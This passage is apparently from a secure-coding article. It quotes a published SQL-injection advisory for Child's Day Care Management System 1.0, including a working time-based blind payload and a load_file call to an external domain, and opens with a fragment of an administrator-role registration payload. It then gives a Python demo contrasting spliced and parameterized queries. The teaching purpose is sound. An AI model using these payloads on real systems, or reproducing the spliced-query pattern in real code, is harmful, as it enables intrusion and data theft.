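    "privacy_policy": True, "additional": [], "additional_instructors": [],
    "profile_default_fields_for_register": {"wp_capabilities": {"value": {"administrator": 1}}},
})
```

<p>The recursive scan matters because an allowlist on top-level keys alone can be bypassed whenever an allowed key carries an arbitrary nested structure; the rejected paths also make a useful detection field in the application's logs.</p>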
<pre><code>## Title: Child's Day Care Management System 1.0 - SQL Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` parameter of Login.php in Child's Day Care Management<br />System 1.0 appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. This system is also vulnerable to<br />SQL injection authentication bypass and stored XSS attacks. An attacker<br />can retrieve all information from the system by using these vulnerabilities.<br />
Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
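<p>The description above says the submitted username reaches the SQL parser: a quote in the input terminates the string literal and the remainder is executed. The following is an added example, not the application's PHP code, that puts the defective string-splicing lookup beside the parameterized one so the difference is observable. SQLite in memory stands in for MySQL; the table, the sample account and the probe string are constructed for illustration.</p>

```python
"""Why splicing the username into SQL text is injectable, beside the parameterized
lookup that is not. SQLite in memory stands in for the application's MySQL database."""
import hashlib
import hmac
import os
import sqlite3


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account, password stored as a salted PBKDF2 hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
                 "salt BLOB NOT NULL, pw_hash BLOB NOT NULL)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO users (username, salt, pw_hash) VALUES (?, ?, ?)",
                 ("alice", salt, _hash_password("correct horse battery staple", salt)))
    return conn


def build_lookup_unsafe(username: str) -> str:
    """The defective pattern: the submitted value becomes part of the SQL text, so a
    quote inside it closes the string literal and the rest is parsed as SQL."""
    return "SELECT id FROM users WHERE username = '" + username + "'"


def find_user_unsafe(conn, username):
    return conn.execute(build_lookup_unsafe(username)).fetchone()


def find_user_safe(conn, username):
    """Parameterized: the value is bound separately from the statement, so the database
    only ever compares it; nothing in it can change the query's structure."""
    return conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterized lookup plus constant-time hash comparison; returns the user id or None."""
    row = conn.execute("SELECT id, salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    user_id, salt, pw_hash = row
    return user_id if hmac.compare_digest(pw_hash, _hash_password(password, salt)) else None


def demo() -> dict:
    """Run a quote-terminating probe through both lookups: the unsafe one matches a row
    for a username that does not exist, the safe one does not."""
    conn = make_db()
    probe = "nobody' OR '1'='1"  # constructed input whose quote changes the unsafe statement
    return {
        "unsafe_sql": build_lookup_unsafe(probe),
        "unsafe_match": find_user_unsafe(conn, probe),
        "safe_match": find_user_safe(conn, probe),
        "login_ok": login_safe(conn, "alice", "correct horse battery staple"),
        "login_bad": login_safe(conn, "alice", "wrong"),
    }
```

<p>The same separation of statement and value is what prepared statements give in PHP (PDO or mysqli with bound parameters); escaping alone is not equivalent, because it depends on the connection's character set and on every call site remembering to do it.</p>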